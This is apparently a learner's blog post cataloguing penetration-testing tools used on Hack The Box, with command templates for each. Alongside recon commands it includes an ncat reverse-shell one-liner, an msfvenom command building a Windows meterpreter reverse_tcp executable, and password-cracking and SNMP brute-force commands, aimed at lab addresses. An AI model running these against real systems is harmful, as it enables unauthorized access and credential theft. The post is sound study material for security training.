My Hack The Box Toolkit

During my HTB studies, I’ve already tried out numerous tools, and I expect to discover many more in the future. Below is a list of these tools, followed by a detailed explanation of each, with examples and useful command templates.

Tool List Link to heading

Nmap – port scanning and service enumeration, a fundamental tool for network reconnaissance.
Ncat – network communication and reverse shell creation; helps connect to remote systems.
John the Ripper – cracking hashed passwords, particularly useful for wordlists and hash files.
Hashcat – GPU-accelerated password cracking, suitable for large hash files and complex passwords.
Gobuster – brute-force discovery of web directories and files, useful for mapping web applications.
ZAP – web vulnerability scanning, fuzzer, and proxy tool for automated security testing.
Burp Suite – web application security testing, HTTP request manipulation, and scanner execution.
Whois – querying domain information such as owner, registrar, and expiration date.
Dig – DNS queries and troubleshooting, quickly checks DNS records.
Dnsenum – DNS enumeration and domain discovery, exploring subdomains and name resolutions.
Curl – testing HTTP/HTTPS requests and API calls from the command line.
Smbclient – managing SMB/CIFS network shares, uploading and downloading files over the network.
Snmpwalk – gathering SNMP information from network devices for configuration and device data analysis.
Onesixtyone – SNMP brute-force attacks to discover unknown community strings.
Metasploit Framework (msf) – running exploits and a full-featured pentesting framework for automated attacks.
Msfvenom – generating payloads and preparing exploits for different platforms and protocols.

Detailed Explanation and Useful Command Templates Link to heading

Nmap Nmap is the foundation of network reconnaissance. It allows you to quickly see which ports are open, which services are running, and what software versions are installed on the target system. Basic scan:

nmap -sC -sV -oN scan.txt 10.10.10.10

Tips: Use it for fast scans, version detection, and even operating system fingerprinting.

Ncat Ncat enables network communication and creating reverse shells, which is useful in penetration testing when testing remote access. Creating a reverse shell (listener side):

ncat -lvnp 4444

Connecting to a remote machine:

ncat target_ip 4444 -e /bin/bash

Tips: Ncat can be easily combined with other tools for network testing.

John the Ripper John specializes in cracking password hashes. It supports multiple hash formats and uses wordlists to try and recover passwords. Cracking a hash:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Tips: Combine with custom wordlists and hash formats; provides fast results for small hash files.

Hashcat Hashcat uses GPU acceleration to efficiently brute-force larger hash files. GPU-accelerated brute-force:

hashcat -m 0 -a 0 hash.txt rockyou.txt

Tips: Ideal for complex hashes, configurable attack modes, and rule sets.

Gobuster Gobuster allows brute-force discovery of web directories and files. Useful for mapping the structure of web applications. Discovering web directories:

gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Tips: Combine with different wordlists and filter by HTTP status codes.

ZAP OWASP Zed Attack Proxy (ZAP) enables scanning for web vulnerabilities, proxying requests, and automated fuzzing of target applications. Tips: Running automated scans and configuring custom fuzzers is very useful in practice.

Burp Suite Burp Suite is a professional web application testing tool that allows intercepting and modifying HTTP requests, scanning for vulnerabilities, and automating tests. Tips: Intercept mode allows request modification, while the repeater function helps test exploits.

Whois / Dig / Dnsenum These tools are used for inspecting domains and DNS records. They help gather information about a target domain and its subdomains.

whois example.com
dig example.com A
dnsenum example.com

Tips: Useful for reconnaissance during web application mapping.

Curl Curl allows testing HTTP/HTTPS requests from the command line, ideal for quickly checking APIs and websites. HTTP request:

curl -X GET http://10.10.10.10/page

Tips: Easily integrates into scripts and automated tests.

Smbclient Used for accessing SMB shares and managing files. Ideal for mapping Windows-based networks.

smbclient //10.10.10.10/share -U username

Tips: Can be used to upload, download files, and test permissions.

Snmpwalk / Onesixtyone SNMP allows gathering information from network devices. Onesixtyone enables brute-force attacks if the community string is unknown.

snmpwalk -v2c -c public 10.10.10.10
onesixtyone -c community_list.txt 10.10.10.0/24

Tips: Useful for mapping network infrastructure and discovering weak SNMP configurations.

Metasploit (msf / msfvenom) Metasploit is a powerful framework for running exploits on multiple platforms. Msfvenom allows generating payloads for target systems. Running exploits:

msfconsole

Generating a payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > shell.exe

Tips: Metasploit modules allow quick testing, while msfvenom creates custom payloads.

This list is, of course, not exhaustive, as I continue to explore new tools and techniques in my HTB studies. However, it provides a solid foundation to review the knowledge I’ve gained so far and helps guide further practice.